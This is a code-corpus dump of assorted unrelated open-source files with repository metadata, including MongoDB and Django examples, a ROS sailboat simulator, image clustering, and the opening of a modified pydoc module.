plt.plot(t[i],r[i],color=(1 - (i/4.0),i/4.0,1.0),label=trials[i])
plt.xlabel("Environment Steps Seen")
plt.ylabel("Average return")
plt.legend(loc=4)
plt.title(task)
plt.show()
|
[
"kevin@bobthechicken.com"
] |
kevin@bobthechicken.com
|
2480acef9f0f7d75bfb2054c94e349972ba33e3d
|
c5702152253670b4d73b104933780ba4af0dd3f8
|
/chapter14/MongoDB_py_14_2.py
|
457d8f4582cda7460e84e09d2ab0ec68521b2780
|
[] |
no_license
|
Pyrarc/TW_MongoDB_Book
|
a8519e386148a15c3c4255f0bdfbff8e20ce12c7
|
4ba5c709463c6991af9c2abd77b397b9e19c5510
|
refs/heads/master
| 2020-09-21T09:49:41.658095
| 2020-01-30T17:26:25
| 2020-01-30T17:26:25
| 224,758,007
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 723
|
py
|
#!/usr/bin/python
#This Python file uses the following encoding:utf-8
#14.2 建立連接與斷開連接
#-1. 建立連接
#導入pymongo包
import pymongo
#連接MongoDB字串
mongodb_server_uri="mongodb://<mongodb_user>:<mongodb_pwd>@127.0.0.1:27017"
#建立與MongoDB的連接,並將此連接賦值給自訂的“mongo”變數
mongo=pymongo.MongoClient(mongodb_server_uri)
#定位到E-commerce資料庫
db=mongo["E-commerce"]
#定位到Members集合
collection=db.get_collection("Members")
#讀取Members集合中的記錄數並列印
print("Number of Documents: "+str(collection.find().count()))
#關閉MongoDB連接
mongo.close()
|
[
"noreply@github.com"
] |
noreply@github.com
|
3b5faf029aed4be7d85694ac734b8aed784d187a
|
b156aad4624ec6dbc2efcca93181bbb948d16cc6
|
/utils/utils.py
|
c128221bb9fdc076717f2e26e232be3b58d048cc
|
[] |
no_license
|
itang85/bookshop-django
|
d191e2af002db94073ee8c59eeb768002443958f
|
b136629b4e5b1dc7f0661e4b06618f31c95d7ede
|
refs/heads/master
| 2023-03-28T02:59:06.729909
| 2021-03-05T15:41:49
| 2021-03-05T15:41:49
| 332,227,518
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,870
|
py
|
import base64, json, re, jwt, datetime, time, hashlib, random
from calendar import timegm
# 导入谷歌验证码相关模块
# import pyotp
# 导入使用缓存的模块
# from django.core.cache import cache
from rest_framework.throttling import BaseThrottle
from django.conf import settings
from conf.area.area_list import area_dict
from utils.settings import api_settings
def jwt_payload_handler(account):
payload = {
'id': account.pk,
'exp': datetime.datetime.utcnow() + api_settings.JWT_EXPIRATION_DELTA # 过期时间
}
if api_settings.JWT_ALLOW_REFRESH:
payload['orig_iat'] = timegm(
datetime.datetime.utcnow().utctimetuple()
)
if api_settings.JWT_AUDIENCE is not None:
payload['aud'] = api_settings.JWT_AUDIENCE
if api_settings.JWT_ISSUER is not None:
payload['iss'] = api_settings.JWT_ISSUER
return payload
def jwt_get_user_id_from_payload_handler(payload):
return payload.get('id')
def jwt_encode_handler(payload):
return jwt.encode(
payload,
api_settings.JWT_PRIVATE_KEY or api_settings.JWT_SECRET_KEY,
api_settings.JWT_ALGORITHM
)
def jwt_decode_handler(token):
options = {
'verify_exp': api_settings.JWT_VERIFY_EXPIRATION,
}
return jwt.decode(
token,
api_settings.JWT_PUBLIC_KEY or api_settings.JWT_SECRET_KEY,
[api_settings.JWT_ALGORITHM],
options=options,
verify=api_settings.JWT_VERIFY,
leeway=api_settings.JWT_LEEWAY,
audience=api_settings.JWT_AUDIENCE,
issuer=api_settings.JWT_ISSUER
)
def jwt_response_payload_handler(token, user=None, request=None):
return {
'token': token
}
# 频率组件
VISIT_RECORD = {}
class VisitThrottle(BaseThrottle):
def __init__(self):
self.history = None
def allow_request(self, request, view):
remote_addr = request.META.get('HTTP_X_REAL_IP')
# print('请求的IP:',remote_addr)
ctime = time.time()
if remote_addr not in VISIT_RECORD:
VISIT_RECORD[remote_addr] = [ctime,]
return True
history = VISIT_RECORD.get(remote_addr)
self.history = history
while history and history[-1] < ctime - 60:
history.pop()
print(VISIT_RECORD)
if len(history) < 100: # 限制的频数 设置同一IP该接口一分钟内只能被访问100次
history.insert(0, ctime)
return True
else:
return False
def wait(self):
ctime = time.time()
return 60 - (ctime-self.history[-1])
def get_region_cn(code):
province = area_dict['province_list'][code[0:2] + '0000']
city = area_dict['city_list'][code[0:4] + '00']
county = area_dict['county_list'][code]
return province + '-' + city + '-' + county
|
[
"1094252227@qq.com"
] |
1094252227@qq.com
|
53b55c5666eddc66b6f56eb33b1291a42a745e77
|
d98c999992219106832354bf329308ece67785b7
|
/food/models.py
|
b30a93daada7efa6c4c591f5aaf0bd531f51239f
|
[] |
no_license
|
shadownetz/shadownetzPortfolio
|
5f60ac1ce8b6fb38db90b1446e7eabae29c134d2
|
2f807c83f34a43310b49d396b5e0f8e3ede2aa6b
|
refs/heads/master
| 2023-04-04T13:32:49.372823
| 2021-04-16T16:26:43
| 2021-04-16T16:26:43
| 230,619,631
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,003
|
py
|
from django.db import models
from django.conf import settings
class FoodBlog(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, null=True, blank=True)
title = models.CharField(max_length=100, blank=False)
content = models.TextField(blank=False)
tags = models.CharField(max_length=500, blank=True, null=True)
views = models.IntegerField(default=0)
comments = models.IntegerField(default=0)
url = models.URLField(blank=True)
author = models.CharField(max_length=50, blank=True)
display_image = models.URLField(blank=True)
date_created = models.DateTimeField(auto_now_add=True)
def __str__(self):
return str(self.user) + '_' + str(self.id) + '_blog'
class FoodBlogComment(models.Model):
user = models.EmailField(blank=False)
blog = models.ForeignKey(settings.FOOD_MODEL, on_delete=models.CASCADE)
message = models.TextField(blank=False)
date_created = models.DateTimeField(auto_now_add=True)
|
[
"okwuzuchiagozie@gmail.com"
] |
okwuzuchiagozie@gmail.com
|
8c6784949a110d4a088c4068d153e777332244b5
|
beeb17bbfd7e47d81e90e6f79ca1e5e86d475302
|
/LeetCode/Easy/1005.py
|
9736f9fd354894d192a69a9ba28113e2de10efb1
|
[
"Apache-2.0"
] |
permissive
|
jonturkz/Competitive-Programming
|
a6b4b14d5cb72629234c3336a7cd711af8f13116
|
972c7e1b10c6c2701212c75b225daebcbe2e54f6
|
refs/heads/master
| 2022-11-17T05:47:22.423679
| 2020-07-16T15:51:22
| 2020-07-16T15:51:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 415
|
py
|
'''
@Author: zhaoyang.liang
@Github: https://github.com/LzyRapx
@Date: 2020-01-20 22:51:56
'''
class Solution:
def largestSumAfterKNegations(self, A: List[int], K: int) -> int:
if len(A) == 0:
return 0
if K == 0:
return sum(A)
heapq.heapify(A)
for _ in range(K):
cur = heapq.heappop(A)
heapq.heappush(A, -cur)
return sum(A)
|
[
"1303377506@qq.com"
] |
1303377506@qq.com
|
8d92025dbf2bb0cea6804b60fd1baa86386d8e3d
|
737f0e29fb28a4d6d0de15ef1664e68bf8d8fad3
|
/pwndbg/gdbutils/__init__.py
|
9bbeebc32d5a5e9603f23e6668e87519a1a89611
|
[
"MIT"
] |
permissive
|
MachineHunter/pwndbg-perceptor
|
ff90038bf569c523f0759899fb36f98023529084
|
183b03a7a299363632a80be0686d099976659bad
|
refs/heads/master
| 2023-08-13T09:32:36.039009
| 2021-10-08T07:17:03
| 2021-10-08T07:17:03
| 409,278,625
| 0
| 0
|
MIT
| 2021-10-08T02:22:12
| 2021-09-22T16:31:01
|
Python
|
UTF-8
|
Python
| false
| false
| 82
|
py
|
# -*- coding: utf-8 -*-
"""
Put all new things related to gdb in this module.
"""
|
[
"noreply@github.com"
] |
noreply@github.com
|
ba6698bc8cf2a56dd3bd8e3bf35d8d37a1c3de83
|
771559e2a67798375e818e845acfb96f6aa87045
|
/Practice/pattern_programs/reverse_pyramid.py
|
c2d8d9889efe754dbc5bcd9f651ed2908fb5c819
|
[] |
no_license
|
krishnareddygajjala/flash
|
1bd723f26c8d41feffbabf2cb4111402ff309f7a
|
f59b3de0726a8836c27cc550071e534b8edb4230
|
refs/heads/master
| 2018-11-08T06:43:49.345685
| 2018-08-28T13:05:46
| 2018-08-28T13:05:46
| 114,076,732
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
num = int(raw_input("enter no of rows : "))
for i in range(num,0,-1):
for j in range(0,num-i):
print "",
for j in range(0,i):
print "* ",
print ""
|
[
"gvkreddy71@gmail.com"
] |
gvkreddy71@gmail.com
|
2443df63e5d4c5517962c02559362d1ca4ab1294
|
cf2aec9e7669f239280f380ca9729c02c64f4acb
|
/src/爬虫/jd/jd/jd/pipelines/pipelines.py
|
4f8043d7dbf136f306a1688d9cb55ceaa367c8b3
|
[] |
no_license
|
scutkaihua/learning-python
|
6b7b685d1e4c263d4370b2bc6f326e35c35ad748
|
157a1b774e20fffa80c2b23ad048180d1d18f841
|
refs/heads/master
| 2023-01-24T05:50:31.193532
| 2020-11-26T09:19:47
| 2020-11-26T09:19:47
| 298,978,352
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 803
|
py
|
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
import json
class JdPipeline:
def __init__(self):
self.f = open("F:/jd.txt","w",encoding='utf-8')
def process_item(self, item, spider):
return item
def close_spider(self,spider):
print("--------------------pipeline save-----------------")
spider.items['info'].sort(key=lambda x:int(x["pageindex"])*50 + int(x["index"]))
#print(spider.items)
self.f.write("{info:[\n")
for i in spider.items['info']:
self.f.write(json.dumps(dict(i),ensure_ascii=False,indent=4)+",")
self.f.write("\n]}")
self.f.close()
|
[
"kaihua.yang@163.com"
] |
kaihua.yang@163.com
|
b0a4fdf7a72979e444fdfa623f69a8f29cd809db
|
13a179f6251d8354b058ff02b3101d904b606f0b
|
/src/shepherd_simu/src/sailboat_sim.py
|
55da970d98847cf36e6b2ca0d542b0e025b062a6
|
[
"MIT"
] |
permissive
|
ENSTA-Bretagne-Shepherd/Shepherd-Ros-Structure
|
4bb2ecb146e9fbc0897a780980634a711dc1788b
|
6ce33426911fc50dfd61f165d73efe9702c2009b
|
refs/heads/master
| 2021-01-12T08:36:38.511501
| 2017-02-22T13:20:17
| 2017-02-22T13:20:17
| 76,635,278
| 1
| 0
| null | 2017-02-10T16:13:33
| 2016-12-16T08:16:52
|
CMake
|
UTF-8
|
Python
| false
| false
| 1,281
|
py
|
#!/usr/bin/env python
import rospy
from models.sailboat import Sailboat
from shepherd_reg.msg import SailboatCmd
from shepherd_disp.msg import SailboatPose
from std_msgs.msg import Float64
def update_cmd(msg):
global cmd
print 'Updated cmd:', msg.rudder_angle, msg.sail_angle
cmd = [msg.rudder_angle, msg.sail_angle]
def update_wind_direction(msg):
global wind_direction
wind_direction = msg.data
def update_wind_force(msg):
global wind_force
wind_force = msg.data
rospy.init_node('sailboat_simu')
sailboat = Sailboat(theta=0.1, v=3)
# Sailboat pose publisher
pose_pub = rospy.Publisher('sailboat/pose_real', SailboatPose, queue_size=1)
# Subscribe to the command of the sailboat
sub = rospy.Subscriber('sailboat/cmd', SailboatCmd, update_cmd)
# Subscribe to the wind
rospy.Subscriber('env/wind_direction', Float64, update_wind_direction)
rospy.Subscriber('env/wind_force', Float64, update_wind_force)
# Command
cmd = [0, 0]
wind_force = 3
wind_direction = 0
# rate
rate = rospy.Rate(10)
while not rospy.is_shutdown():
sailboat.simulate(cmd, wind_force, wind_direction)
pose = SailboatPose()
pose.pose.x = sailboat.x
pose.pose.y = sailboat.y
pose.pose.theta = sailboat.theta
pose_pub.publish(pose)
rate.sleep()
|
[
"ejalaa12@gmail.com"
] |
ejalaa12@gmail.com
|
951e54a1ed72d5527bcb0dd1b534c6ef1079a65b
|
2cc84af3d2a146b4dbb04bed3cfd542fa0622489
|
/image-tools/image_clustering/tile_clustering.py
|
1047091f0afa7d8cb8376a27b8df124a3fda22b4
|
[
"MIT"
] |
permissive
|
flegac/deep-experiments
|
e6a05b1a58eadf4c39580e95bb56d311e3dfa0ac
|
e1b12e724f2c8340cbe9c51396cf3f42e3b4e934
|
refs/heads/master
| 2020-04-09T00:20:15.132255
| 2019-10-11T16:39:47
| 2019-10-11T16:39:47
| 159,862,795
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,458
|
py
|
import glob
import os
from typing import List, Callable
import cv2
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.colors import to_rgb
from scipy.stats import wasserstein_distance
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.pipeline import Pipeline
from image_clustering.tiler import GridTiler
from mydeep_api.tensor import Tensor
TagComputer = Callable[[Tensor], int]
HistComputer = Callable[[Tensor], Tensor]
class Params(object):
def __init__(self, bins: int = 64, pca_components: int = 64, tile_size: int = 64):
self.bins = bins
self.pca_components = pca_components
self.tiler = GridTiler(tile_size=tile_size)
def hist_computer(self, img: Tensor):
r, _ = np.histogram(img[2], bins=self.bins, range=[0, 256])
r, _ = np.histogram(img[2], bins=self.bins, range=[0, 256])
r = r / np.linalg.norm(r)
g, _ = np.histogram(img[1], bins=self.bins, range=[0, 256])
g = g / np.linalg.norm(g)
b, _ = np.histogram(img[0], bins=self.bins, range=[0, 256])
b = b / np.linalg.norm(b)
return np.hstack((r, g, b))
class ClusterTagComputer(TagComputer):
def __init__(self, path: str, hist_computer: HistComputer):
self.hist_computer = hist_computer
self.clusters = [
[hist_computer(cv2.imread(img_path)) for img_path in glob.glob('{}/{}/*.png'.format(path, _))]
for _ in os.listdir(path)
]
self.stats()
def stats(self):
for _ in self.clusters:
for c in _:
bins = np.array(range(len(c)))
prob = c / np.sum(c)
image = np.sort(np.random.choice(bins, size=128 * 128, replace=True, p=prob)).reshape((128, 128))
plt.imshow(image, 'gray')
def __call__(self, data: Tensor):
hist = self.hist_computer(data)
d2 = [min([wasserstein_distance(hist, _) for _ in c]) for c in self.clusters]
return int(np.argmin(d2))
class KmeanTagComputer(TagComputer):
def __init__(self, p: Params, images: List[str], cluster_number: int):
self.hist_computer = p.hist_computer
self.model = KMeans(n_clusters=cluster_number, n_init=20)
dataset = []
for _ in images:
img = cv2.imread(_)
boxes = GridTiler(tile_size=32).tiles(img.shape[:2])
histograms = [p.hist_computer(box.cut(img)) for box in boxes]
dataset.extend(histograms)
self.pipeline = Pipeline(steps=[
('pca', PCA(n_components=p.pca_components)),
('clustering', self.model),
])
self.pipeline.fit(dataset)
# self.stats()
def stats(self):
centers = (self.model.cluster_centers_ + 1) / 2
for c in centers:
bins = np.array(range(len(c))) * 4
prob = c / np.sum(c)
image = np.sort(np.random.choice(bins, size=128 * 128, replace=True, p=prob)).reshape((128, 128))
plt.imshow(image, 'gray')
def __call__(self, data: Tensor):
hist = self.hist_computer(data)
return self.pipeline.predict([hist])[0]
def tile_clustering(img: Tensor, tag_computer: TagComputer, tiler: GridTiler):
out = img.copy()
k = 8
for box in tiler.tiles(img.shape[:2]):
flag = tag_computer(box.cut(img))
pt1 = (box.left + k, box.top + k)
pt2 = (box.right - k, box.bottom - k)
cv2.rectangle(out, pt1, pt2, tuple(256 * _ for _ in to_rgb(COLORS[flag])), 2)
return out
COLORS = ['red', 'blue', 'green', 'white', 'yellow',
'orange', 'purple', 'cyan', 'magenta', 'gray']
P = Params(
bins=128,
pca_components=128,
tile_size=128
)
if __name__ == '__main__':
dataset = 'cs'
images = glob.glob('../tests/20190802_export_s2_it1/{}/*_?.png'.format(dataset))
model_tag_computer = KmeanTagComputer(P, images, cluster_number=4)
cluster_tag_computer = ClusterTagComputer('../image_editor/tiles', P.hist_computer)
os.makedirs(dataset, exist_ok=True)
for _ in images:
name = os.path.basename(_).replace('.tif', '')
img = cv2.imread(_)
img1 = tile_clustering(img, model_tag_computer, P.tiler)
cv2.imwrite('{}/{}_model.png'.format(dataset, name), img1)
# img2 = tile_clustering(img, cluster_tag_computer, P.tiler)
# cv2.imwrite('{}/{}_clusters.png'.format(dataset, name), img2)
|
[
"florent.legac@gmail.com"
] |
florent.legac@gmail.com
|
d296839330771f766c3d3017ae333bce65eb9717
|
9797b289a89012f381c6b1de794374ab0d73ed1a
|
/Chapter_4/4.13.py
|
cfbf7008b36941149c4702d4cd9dc81c4bac8279
|
[] |
no_license
|
qh4321/1_python_crash_course
|
23c26d1c39cd0808e987fb8992e092a34aacc489
|
aa2d72857e3173a3951e52538607b6e331f50a24
|
refs/heads/master
| 2022-12-31T09:03:47.660232
| 2020-10-22T13:33:13
| 2020-10-22T13:33:13
| 301,715,691
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 346
|
py
|
buffet = ('beef', 'chicken', 'nuddle', 'egg', 'fish')
print('\nYou can choose from the following menu items:')
for food in buffet:
print('- ' +food)
buffet = ('beef', 'chicken', 'nuddle', 'duck egg', 'pizza')
print('\nOur menu has been updated.\nYou can now choose from the following menu items:')
for food in buffet:
print('- ' +food)
|
[
"52791020+qh4321@users.noreply.github.com"
] |
52791020+qh4321@users.noreply.github.com
|
588b694346582a0678e68e17a1ba246a85b81a9f
|
71249a03c862007f97fc1af2c5ce41b5e170a8fe
|
/project/CensorThis_WebApp/serializers.py
|
5c108491518e4a5d2f8b9b8af301040cc3e5e5af
|
[] |
no_license
|
ShayGeko/Fall2020-Hackathon
|
0f5d0a59ea9274c06df81e2263979228b3e968db
|
2228cbdd694caa558946bbe4bfac465c5def5981
|
refs/heads/main
| 2023-01-06T23:02:11.525821
| 2020-11-09T04:18:20
| 2020-11-09T04:18:20
| 310,875,500
| 0
| 0
| null | 2020-11-08T03:26:33
| 2020-11-07T15:34:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,045
|
py
|
from django.contrib.auth.models import User, Group
from rest_framework import serializers
from CensorThis_WebApp.models import Censor
class UserSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = User
fields = ['url', 'username', 'email', 'groups']
class GroupSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Group
fields = ['url', 'name']
class CensorSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Censor
fields = ['toCensor', 'censorWith']
def create(self, validated_data):
toCensor = validated_data.get('toCensor', None)
if toCensor is not None:
censor = Censor.objects.filter(toCensor = toCensor).first()
if censor is not None:
newCensor = censor
newCensor.censorWith = validated_data.get("censorWith", None);
return newCensor
newCensor = Censor.objects.create(**validated_data)
return newCensor
|
[
"shramko.georgiy@gmail.com"
] |
shramko.georgiy@gmail.com
|
d6ce1c57d5d48ad3fcd540884b07b83997ecc399
|
4c3e992678341ccaa1d4d14e97dac2e0682026d1
|
/addons/mass_mailing/tests/test_mail.py
|
09822f1c111822ef55b13830edbcad40590accf1
|
[] |
no_license
|
gahan-corporation/wyatt
|
3a6add8f8f815bd26643e1e7c81aea024945130d
|
77e56da362bec56f13bf0abc9f8cf13e98461111
|
refs/heads/master
| 2021-09-03T18:56:15.726392
| 2018-01-08T02:54:47
| 2018-01-08T02:54:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 328
|
py
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from gerp.addons.mail.tests.common import TestMail
class test_message_compose(TestMail):
def test_OO_mail_mail_tracking(self):
""" Tests designed for mail_mail tracking (opened, replied, bounced) """
pass
|
[
"duchess@gahan-corporation.com"
] |
duchess@gahan-corporation.com
|
536b5a31bb0aab2c739d1cca6e137402a670a21d
|
358e1f9957c7c3aeaf2bd45d1d0a9cddc2f77180
|
/Lesson 4/Lesson4 - type hinting/type_test.pyi
|
03ba1f989bd692d85e0d4773439d0d77d434d812
|
[
"MIT"
] |
permissive
|
kiruxa555/MADPythonCourse
|
906e4f272aa47722586e18974239cf841aa9a3ca
|
f3bd38dcd30dc220bd691d301b2845401cc70b2e
|
refs/heads/master
| 2023-06-12T02:21:11.572197
| 2021-06-30T08:07:10
| 2021-06-30T08:07:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 39
|
pyi
|
def add(a: int, b: int) -> int:
...
|
[
"madmasm@gmail.com"
] |
madmasm@gmail.com
|
8f070f7d9758539e7bd4263bceb1250c00f22a0a
|
5e2c41f3ab0c55e6a71ae421b3a99c46482efe6e
|
/ethstats.py
|
6ff00d14dc7754e54196cb0c4c07600b933053dc
|
[] |
no_license
|
rytisz/utils
|
9bff61ac2559b601ec3484bcee246e4ebe5b3c0f
|
f5178a98acf739745ff72ee41d0de6bc993f8ed5
|
refs/heads/master
| 2021-01-19T18:53:13.478723
| 2017-03-04T00:57:47
| 2017-03-04T00:57:47
| 83,710,412
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,259
|
py
|
#!/usr/bin/python
from optparse import OptionParser
import time
import sys
parser = OptionParser()
parser.add_option("-n", "--period", dest="PERIOD", default=1,
help="average period in seconds, default 1 sec")
parser.add_option("-i", "--interface", dest="INTERFACE", default="all",
help="interface witch statistics is measured, default all interfaces")
(options, args) = parser.parse_args()
class ethstats:
def __init__(self):
self.interface = vars(options)['INTERFACE']
try:
self.period = int( vars(options)['PERIOD'])
except ValueError as e:
sys.stderr.write("Wrong period n: '%s', n should be integer\n"%vars(options)['PERIOD'])
sys.exit(1)
try:
self.previous, self.pts = self.__read_stats()
except KeyError as e:
sys.stderr.write("Interface %s not found\n"%e)
sys.exit(1)
def __read_stats(self):
d= {}
l= []
with open('/proc/net/dev') as f:
next(f)
next(f)
for line in f:
l= line.split()
d[l[0].rstrip(':')]=list(map(int,l[1:]))
ts=time.time()
if self.interface == "all":
return d, ts
return {self.interface:d[self.interface]}, ts
def get(self):
current, cts = self.__read_stats()
rez={}
for interface in current:
rx=(current[interface][0] - self.previous[interface][0])*8/10**6/(cts-self.pts)
tx=(current[interface][8] - self.previous[interface][8])*8/10**6/(cts-self.pts)
rpps=(current[interface][1] - self.previous[interface][1])/10**3/(cts-self.pts)
tpps=(current[interface][9] - self.previous[interface][9])/10**3/(cts-self.pts)
rez[interface]=[tx,tpps,rx,rpps]
self.previous, self.pts = current, cts
return rez
stats=ethstats()
while True:
try:
time.sleep(stats.period)
rez=stats.get()
for interface in rez:
sys.stdout.write("%10s: TX%9.2f Mbps%8.2f kPPS RX%9.2f Mbps%8.2f kPPS\n"%tuple([interface]+rez[interface]))
sys.stdout.flush()
except KeyboardInterrupt:
break
|
[
"rytiszigmantavicius@gmail.com"
] |
rytiszigmantavicius@gmail.com
|
4fe27b358e04b2dd76cba83b1b138fdd6e369026
|
29fd3daff8c31764c00777e67d2cc9b3e94ba761
|
/examples/ch05_examples/mandelbrot/mandelbrot/cython_pure_python/setup.py
|
440f9ca05742dda490c59ab9d203bd5d6f221906
|
[] |
no_license
|
mwoinoski/crs1906
|
06a70a91fc99e2d80e2ed3cea5724afa22dce97d
|
202f7cc4cae684461f1ec2c2c497ef20211b3e5e
|
refs/heads/master
| 2023-06-23T17:13:08.163430
| 2023-06-12T21:44:39
| 2023-06-12T21:44:39
| 39,789,380
| 1
| 2
| null | 2022-01-26T20:43:18
| 2015-07-27T17:54:56
|
Python
|
UTF-8
|
Python
| false
| false
| 424
|
py
|
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
# for notes on compiler flags e.g. using
# export CFLAGS=-O2
# so gcc has -O2 passed (even though it doesn't make the code faster!)
# http://docs.python.org/install/index.html
setup(
cmdclass = {'build_ext': build_ext},
ext_modules = [Extension("calculate_z", ["calculate_z.pyx"])]
)
|
[
"michaelw@articulatedesign.us.com"
] |
michaelw@articulatedesign.us.com
|
95eaf80a4b064aa8106077d14d8e97f76da9bee4
|
9a03b4c88a31cc05648f6a7dee1c22cfe08dc872
|
/mod_pydoc.py
|
dacb667e4bae87618e48f4bc9594ad048609d8f4
|
[] |
no_license
|
u8y7541/mod_pydoc
|
71a9f1802752a79d560c7cc155f060227ec7bf99
|
a5fdf9409debf39724bd1fbf5553d86b117e201b
|
refs/heads/master
| 2021-05-04T09:11:26.622118
| 2016-10-09T17:45:25
| 2016-10-09T17:45:25
| 70,418,784
| 0
| 0
| null | 2016-10-09T17:22:23
| 2016-10-09T17:22:22
| null |
UTF-8
|
Python
| false
| false
| 101,217
|
py
|
#!/usr/bin/env python3
"""Generate Python documentation in HTML or text for interactive use.
At the Python interactive prompt, calling help(thing) on a Python object
documents the object, and calling help() starts up an interactive
help session.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on the given port on the
local machine. Port number 0 can be used to get an arbitrary unused port.
Run "pydoc -b" to start an HTTP server on an arbitrary unused port and
open a Web browser to interactively browse documentation. The -p option
can be used with the -b option to explicitly specify the server port.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/X.Y/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__all__ = ['help']
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - synopsis() cannot be prevented from clobbering existing
# loaded modules.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import builtins
import importlib._bootstrap
import importlib.machinery
import importlib.util
import inspect
import io
import os
import pkgutil
import platform
import re
import sys
import time
import tokenize
import warnings
from collections import deque
from reprlib import Repr
from traceback import format_exception_only
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', result.rstrip()) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = doc.strip().split('\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not lines[1].rstrip():
return lines[0], '\n'.join(lines[2:])
return '', '\n'.join(lines)
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = pairs[1].join(text.split(pairs[0]))
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return (inspect.isfunction(obj) or
inspect.ismethod(obj) or
inspect.isbuiltin(obj) or
inspect.ismethoddescriptor(obj))
def _is_bound_method(fn):
"""
Returns True if fn is a bound method, regardless of whether
fn was implemented in Python or in C.
"""
if inspect.ismethod(fn):
return True
if inspect.isbuiltin(fn):
self = getattr(fn, '__self__', None)
return not (inspect.ismodule(self) or (self is None))
return False
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant or internal.
# XXX Remove __initializing__?
if name in {'__author__', '__builtins__', '__cached__', '__credits__',
'__date__', '__doc__', '__file__', '__spec__',
'__loader__', '__module__', '__name__', '__package__',
'__path__', '__qualname__', '__slots__', '__version__'}:
return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return True
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
results = []
for (name, kind, cls, value) in inspect.classify_class_attrs(object):
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
results.append((name, kind, cls, value))
return results
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not line.strip():
line = file.readline()
if not line: break
